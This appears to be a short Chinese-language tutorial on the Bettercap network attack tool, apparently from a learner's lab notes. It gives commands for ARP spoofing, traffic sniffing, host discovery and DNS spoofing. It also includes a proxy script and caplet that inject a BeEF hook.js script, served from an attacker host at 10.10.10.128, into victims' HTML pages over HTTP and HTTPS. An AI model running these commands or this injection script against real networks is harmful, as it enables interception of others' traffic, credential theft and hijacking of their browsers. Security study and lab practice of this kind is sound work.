Bettercap 简单使用

安装

sudo apt install bettercap

启动

# 查看网卡
ifconfig
# 启动
sudo bettercap -iface eth0

模块

键入help命令即可查看可使用的模块

modules.png

# 开启流量嗅探
net.sniff on
# 开启arp欺骗
arp.spoof on
# 开始网络主机发现
net.recon on
# 显示主机列表缓存（默认按ip排序）
net.show
# 探测网络上的新主机
net.probe on

DNS欺骗

set dns.spoof.domains www.example.com
set dns.spoof.address 10.10.10.128
dns.spoof on

dns_spoof.png

arp欺骗+js注入

eval.js源码：

function onLoad(){
    log("Bettercap loaded.");
}
function onResponse(req, res){
    if(res.ContentType.indexOf('text/html')==0){ // 修改html文件的源码
        var body = res.ReadBody();
        log("inject js!");
        if(body.indexOf('</head>') != -1){
            res.Body = body.replace('
            </head>',
            // 以下内容为植入网页的js
            '<script type="text/script" src="http://10.10.10.128:3000/hook.js"></script></head>');
        }
    }
}

可将命令保存为cap文件:

set http.proxy.script /root/Desktop/eval.js
set https.proxy.script /root/Desktop/eval.js
http.proxy on
https.proxy on
arp.spoof on

命令行运行bettercap -iface eth0 -caplets /root/Desktop/xx.cap

植入js操作在https页面时可能导致浏览器警告网页证书不可信，也可能导致浏览器访问超时
网页植入beef 的hook.js后在控制端未看到该主机，不知什么原因

wireshark 查看导出的流量

set net.sniff.output /root/Desktop/test.pcap
net.sniff on
arp.spoof on

wireshark.png